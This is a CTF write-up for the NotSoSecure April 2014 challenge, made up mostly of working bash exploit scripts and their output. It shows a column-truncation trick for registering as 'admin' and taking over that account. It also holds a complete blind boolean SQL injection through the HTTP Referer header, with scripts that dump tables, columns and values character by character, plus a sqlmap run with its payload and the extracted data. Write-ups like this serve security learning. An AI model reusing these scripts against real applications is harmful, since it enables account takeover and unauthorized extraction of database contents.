# NotSoSecure CTF April 2k14


Flag 1 - Column truncation

# cat get_register_page
#!/bin/bash
# Fetch the CTF landing page and decode the hint hidden in its last HTML
# comment.  The hint is the third '-'-separated field of that comment line
# (spaces stripped), which is base64-encoded gzip data.
# Outputs: the raw encoded hint, then its decoded text, to stdout.

readonly url='http://ctf.notsosecure.com/9128938921839838/'

# Last "<!--" line of the page, reduced to its third '-'-delimited field.
hint=$(curl --silent --location --request GET "$url" \
  | grep -e '<!--' \
  | tail -n 1 \
  | awk -F '-' '{print $3}' \
  | tr -d ' ')

printf '%s\n' "$hint"
# base64 -> gzip -> plain text; the final echo terminates the line in case
# the decoded text has no trailing newline.
printf '%s\n' "$hint" | base64 -d | gunzip
echo

# ./get_register_page 
H4sIAAAAAAAAAAsyTs80LTEu0ssoyc0BACMzGYUNAAAA
R3gi5t3r.html

# cat get_flag_1
#!/bin/bash
# Flag 1 helper: register an account with the given name/e-mail/password,
# then log in as "admin" using that same password.
#
# Arguments: $1 - registration name (spaces are sent as %20)
#            $2 - registration e-mail
#            $3 - password, used for both registration fields and the login
# Outputs:   the registration outcome line, then the post-login lines that
#            mention "Flag" or "feedback", to stdout
# Note:      the cookie jar "nss" is created/overwritten in the current directory.

readonly url='http://ctf.notsosecure.com/9128938921839838'
readonly cookie='nss'

regname=${1// /%20}   # equivalent to: echo -n "$1" | sed 's/ /%20/g'
regemail=$2
regpass=$3

register_url="$url/register.php?regname=$regname&regemail=$regemail&regpass1=$regpass&regpass2=$regpass"
checklogin_url="$url/checklogin.php"

# Registration: keep only the line that reports the outcome.
curl --silent --request GET "$register_url" \
  | grep -e 'successfully' -e 'Already'

# Login as admin with the password just registered; keep flag/feedback lines.
curl --silent --location --request POST \
  --cookie-jar "$cookie" --cookie "$cookie" \
  --data "myusername=admin&mypassword=$regpass" \
  "$checklogin_url" \
  | grep -e 'Flag' -e 'feedback'

# ./get_flag_1 'admin               nss' 'fake@mail.com' 's3cur3'
              <h3 style="text-align: center;font-size: 30px;">You have registered successfully</h3>
       <h4 style="text-align: center;">Well done, 1st Flag is 67326289</h4>
      <center><a href="f33db4ck_flag/index.php" class="btn">feedback</a></center>

Flag 2 - Blind SQLi in HTTP Referer

# cat get_flag_2
#!/bin/bash
# Flag 2 driver: record a baseline feedback reply, then walk the schema with
# the helper scripts in this directory (feedback_base, dump_tables,
# dump_columns, dump_flags), printing a banner before each step.

# Writes ./normal, the baseline reply that ./feedback diffs each probe against.
./feedback_base

# Print a section banner and run the given command.
step() {
  printf '%s\n' "=== $1 ==="
  shift
  "$@"
}

step 'Dump tables' ./dump_tables
step 'Dump columns from flag table' ./dump_columns flag
step 'Dump flags from flag column' ./dump_flags flag flag

# cat feedback_base
#!/bin/bash
# Submit one plain feedback form and save the server's reply to ./normal.
# ./feedback later diffs every probe reply against this baseline file.

readonly ofile='normal'
readonly url='ctf.notsosecure.com/9128938921839838'
readonly feedback_url="$url/f33db4ck_flag/submit.php"

# Fixed placeholder form fields; only the reply body is of interest.
readonly form_data='name=name&email=email&message=message&submit=Submit'

curl --silent --request POST --data "$form_data" "$feedback_url" > "$ofile"

# cat dump_tables
#!/bin/bash
# Enumerate non-system table names through the boolean oracle ./feedback.
# ./feedback takes one SQL condition; the script treats an "Error" in its
# output as "condition is false".  The table count and each name's length
# are found by counting upward until the oracle stops erroring; names are
# then recovered one character at a time from [a-z0-9] (a character outside
# that set produces no output for its position).
# Outputs: "#tables = N" and one "table[i] = name" line per table, to stdout.

readonly schema_filter="table_schema not like '%_schema' and table_schema!='mysql'"

# Exit 0 when ./feedback reports an error for the SQL condition in $1.
oracle_errors() {
  local out
  out=$(./feedback "$1" | grep Error)
  [[ -n "$out" ]]
}

# Number of distinct table names.
ntables=0
while oracle_errors "(select count(distinct table_name) from information_schema.columns where $schema_filter)=$ntables"; do
  ntables=$((ntables + 1))
done
printf '%s\n' "#tables = $ntables"

for ((i = 0; i < ntables; i++)); do
  printf '%s' "table[$i] = "
  row="from information_schema.columns where $schema_filter group by table_name limit $i,1"

  # Length of the i-th table name.
  len=1
  while oracle_errors "(select length(table_name) $row)=$len"; do
    len=$((len + 1))
  done

  # For each position, the first candidate that does not error is the character.
  for ((pos = 1; pos <= len; pos++)); do
    for ch in {a..z} {0..9}; do
      if ! oracle_errors "(select substring(table_name,$pos,1) $row)='$ch'"; then
        printf '%s' "$ch"
        break
      fi
    done
  done
  printf '\n'
done

# cat dump_columns 
#!/bin/bash
# Enumerate the column names of one table through the boolean oracle
# ./feedback (an "Error" in its output is treated as "condition is false").
# The column count and each name's length are found by counting upward until
# the oracle stops erroring; names are recovered one [a-z0-9] character at a
# time (any other character produces no output for its position).
#
# Arguments: $1 - table name
# Outputs:   "table = T", "#columns = N" and one "column[i] = name" line
#            per column, to stdout.

table=$1

# Exit 0 when ./feedback reports an error for the SQL condition in $1.
oracle_errors() {
  local out
  out=$(./feedback "$1" | grep Error)
  [[ -n "$out" ]]
}

# Number of distinct column names in the table.
ncols=0
while oracle_errors "(select count(distinct column_name) from information_schema.columns where table_name='$table')=$ncols"; do
  ncols=$((ncols + 1))
done

printf '%s\n' "table = $table" "#columns = $ncols"

for ((i = 0; i < ncols; i++)); do
  printf '%s' "column[$i] = "
  row="from information_schema.columns where table_name='$table' limit $i,1"

  # Length of the i-th column name.
  len=1
  while oracle_errors "(select length(column_name) $row)=$len"; do
    len=$((len + 1))
  done

  # For each position, the first candidate that does not error is the character.
  for ((pos = 1; pos <= len; pos++)); do
    for ch in {a..z} {0..9}; do
      if ! oracle_errors "(select substring(column_name,$pos,1) $row)='$ch'"; then
        printf '%s' "$ch"
        break
      fi
    done
  done
  printf '\n'
done

# cat dump_flags 
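#!/bin/bash
# Dump the values of one column through the boolean oracle ./feedback
# (an "Error" in its output is treated as "condition is false").
# The row count and each value's length are found by counting upward until
# the oracle stops erroring; values are recovered one [a-z0-9] character at
# a time (any other character produces no output for its position).
#
# Arguments: $1 - table name
#            $2 - column name
# Outputs:   "table = T", "column = C", "#flags = N" and one
#            "flag[i] = value" line per row, to stdout.
# Fix: the "column =" label previously printed the table name.

table=${1:?usage: dump_flags TABLE COLUMN}
column=${2:?usage: dump_flags TABLE COLUMN}

# Exit 0 when ./feedback reports an error for the SQL condition in $1.
oracle_errors() {
  local out
  out=$(./feedback "$1" | grep Error)
  [[ -n "$out" ]]
}

# Number of distinct values in the column.
nflags=0
while oracle_errors "(select count(distinct $column) from $table)=$nflags"; do
  nflags=$((nflags + 1))
done

printf '%s\n' "table = $table" "column = $column" "#flags = $nflags"

for ((i = 0; i < nflags; i++)); do
  printf '%s' "flag[$i] = "

  # Length of the i-th value.
  len=1
  while oracle_errors "(select length($column) from $table limit $i,1)=$len"; do
    len=$((len + 1))
  done

  # For each position, the first candidate that does not error is the character.
  for ((pos = 1; pos <= len; pos++)); do
    for ch in {a..z} {0..9}; do
      if ! oracle_errors "(select substring($column,$pos,1) from $table limit $i,1)='$ch'"; then
        printf '%s' "$ch"
        break
      fi
    done
  done
  printf '\n'
done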

# cat feedback
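#!/bin/bash
# Boolean oracle used by the dump_* scripts.  Sends one feedback form whose
# Referer header carries the payload built from the SQL condition in $1, and
# prints how the reply differs from the baseline ./normal written by
# ./feedback_base.
#
# Arguments: $1 - SQL condition to test
# Outputs:   lines of the reply containing "Thanks", then `diff normal REPLY`
# Requires:  ./normal, curl, xxd
# Exit:      0 after a completed request (the diff status is not propagated);
#            1 when the request fails
# Fix: the reply is stored in a mktemp file instead of "./$RANDOM", which
#      could collide between concurrent runs, and is removed by the EXIT trap
#      on every exit path.

readonly url='ctf.notsosecure.com/9128938921839838'
readonly feedback_url="$url/f33db4ck_flag/submit.php"
readonly form_data='name=name&email=email&message=message&submit=Submit'

# Percent-encode every byte of $1 as "%xx".
encode() {
  printf '%s' "$1" | xxd -p | tr -d '\n' | sed 's/\(..\)/%\1/g'
}

# Print the "Thanks" lines of the reply, then its diff against the baseline.
compare() {
  grep -- Thanks "$ofile"
  diff -- normal "$ofile"
}

condition=${1:?usage: feedback SQL_CONDITION}
injection="'+(select if($condition,'1',(select table_name from information_schema.columns limit 1,2)))+'"
referer=$(encode "$injection")

ofile=$(mktemp) || exit 1
trap 'rm -f -- "$ofile"' EXIT

# Add --proxy 127.0.0.1:8080 here to inspect the traffic through a local proxy.
curl --silent --referer "$referer" --request POST --data "$form_data" "$feedback_url" > "$ofile" \
  || { printf 'feedback: request to %s failed\n' "$feedback_url" >&2; exit 1; }
compare
exit 0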

# ./get_flag_2
=== Dump tables ===
#tables = 2
table[0] = flag
table[1] = temp
=== Dump columns from flag table ===
table = flag
#columns = 1
column[0] = flag
=== Dump flags from flag column ===
table = flag
column = flag
#flags = 1
flag[0] = 1362390

Flag 2 - Blind SQLi in HTTP Referer (sqlmap)

# cat do_sqlmap 
#!/bin/bash

# Run sqlmap against the feedback form's Referer header with a fixed set of
# options, printing the extra options first so the transcript is labelled.
# Arguments: $1 - extra sqlmap options as one space-separated string (may be empty)
sqlm() {
  local extra=$1
  local -r target='http://ctf.notsosecure.com/9128938921839838/f33db4ck_flag/submit.php'
  local -r referer='%27||(select(1)regexp(IF(1=1*,1,%27%27)))||%27'
  local -r true_marker='Thanks!, we will be in touch...'

  printf '%s\n' "$extra"
  # $extra is deliberately unquoted: callers pass several options in one string.
  # shellcheck disable=SC2086
  sqlmap \
    --url="$target" \
    --referer="$referer" \
    --string="$true_marker" \
    --technique=B \
    --threads=4 \
    --answers='it?=Y,any)?=y' \
    $extra
}

# Print a section banner, then run sqlm with the given extra options
# (none for the fingerprint step).
section() {
  printf '%s\n' "=== $1 ==="
  sqlm "${2-}"
}

section 'Fingerprint'
section 'Enumerate DBMS databases' '--dbms=MySQL --dbs'
section 'Enumerate DBMS database tables' '--dbms=MySQL -D seven --tables'
section 'Enumerate DBMS database table columns' '--dbms=MySQL -D seven -T flag --columns'
section 'Dump DBMS database table entries' '--dbms=MySQL -D seven -T flag -C flag --dump'

# ./do_sqlmap
=== Fingerprint ===

sqlmap identified the following injection points with a total of 16 HTTP(s) requests:
---
Place: (custom) HEADER
Parameter: Referer #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: '||(select(1)regexp(IF(1=1 AND 4549=4549,1,'')))||'
---
web server operating system: Linux Ubuntu 12.04 (Precise Pangolin)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.0

=== Enumerate DBMS databases ===
--dbms=MySQL --dbs

available databases [2]:
[*] information_schema
[*] seven

=== Enumerate DBMS database tables ===
--dbms=MySQL -D seven --tables

Database: seven
[2 tables]
+------+
| flag |
| temp |
+------+

=== Enumerate DBMS database table columns ===
--dbms=MySQL -D seven -T flag --columns

Database: seven
Table: flag
[1 column]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| flag   | varchar(20) |
+--------+-------------+

=== Dump DBMS database table entries ===
--dbms=MySQL -D seven -T flag -C flag --dump

Database: seven
Table: flag
[1 entry]
+---------+
| flag    |
+---------+
| 1362390 |
+---------+
